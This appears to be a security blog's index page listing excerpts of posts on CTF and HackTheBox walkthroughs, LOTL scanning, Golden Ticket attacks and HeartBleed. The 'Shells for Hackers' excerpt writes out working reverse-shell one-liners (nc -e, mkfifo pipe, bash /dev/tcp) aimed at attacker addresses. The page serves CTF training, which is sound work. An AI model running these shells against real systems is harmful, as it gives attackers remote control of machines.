LOTL Port Scanning

Living Off The Land Living Off The Land (LOTL) techniques leverage native tools, present in the target or victim’s environment, to accomplish tasks such as information gathering, persistence, and even execution. By using native tools, attackers often avoid detection, as these tools are usually trusted and permitted to operate freely. One fundamental technique used in […]

SSH Key Exploitation and SMB Recon: A CTF

CTFs (Capture The Flag competitions) offer hands-on experience, simulating real-world cyber scenarios. They hone skills, encourage problem-solving, foster teamwork, and promote a deep understanding of cyber threats and defense strategies.   Insights SSH Key Usage: Stored SSH keys can be exploited to gain access, especially if they aren’t password-protected or if the passphrase can be […]

Threat Modeling: STIDE and DFD

In the dynamic landscape of cybersecurity, establishing a clear understanding of threats is paramount. While introductory courses may gloss over various methodologies, diving deep into advanced techniques such as STRIDE and Data Flow Diagrams (DFD) is essential for established professionals. This article provides an in-depth examination of these advanced threat modeling methodologies. The Significance of […]

Working with Linux Capabilities | Cap HackTheBox

Linux capabilities allow for a nuanced approach to the security architecture, breaking down the absolute root privilege into specific individual permissions. This division provides a detailed control mechanism as opposed to the generic superuser model. “Cap” is a HackTheBox machine designed to test one’s grasp of pcap files and SSH, but also emphasizes the importance […]

Scanning for the CTF Arena

This is a reference guide offering concise command suggestions for machine scanning. It encompasses widely-used tools and provides “living off the land” commands, ensuring adaptability to various environments. Host Discovery nmap # Basic ping sweep | └─$ nmap -sn 10.10.10.0/24 # If ICMP is blocked: | └─$ nmap -Pn -p 80,443 10.10.10.0/24 ARP Scan with […]

Golden Ticket Attacks

Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to vulnerabilities. The Golden Ticket attack exemplifies a critical AD weakness, promising attackers unparalleled access once exploited. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag […]

Shells for Hackers

This cheat sheet is an essential guide, designed to aid in swiftly deploying shells across various computing environments. Use it as a go-to reference. Reverse Shells Net Cat listener> nc -nlvp 31337nc -e /bin/sh 10.10.10.10 31337 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 31337 >/tmp/f Bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh […]

Exploiting HeartBleed for OSCP | Valentine HackTheBox

HackTheBox presents “Valentine”, a vulnerable machine centered around OpenSSL’s well-known HeartBleed issue. This challenge pushes us to grapple with essential security concepts. The path to the flags involves decoding messages and navigating Linux for privilege escalation. In this walkthrough, I’ll share my approach to Valentine, highlighting the steps and strategies I used. Let’s dive into […]

Back To Top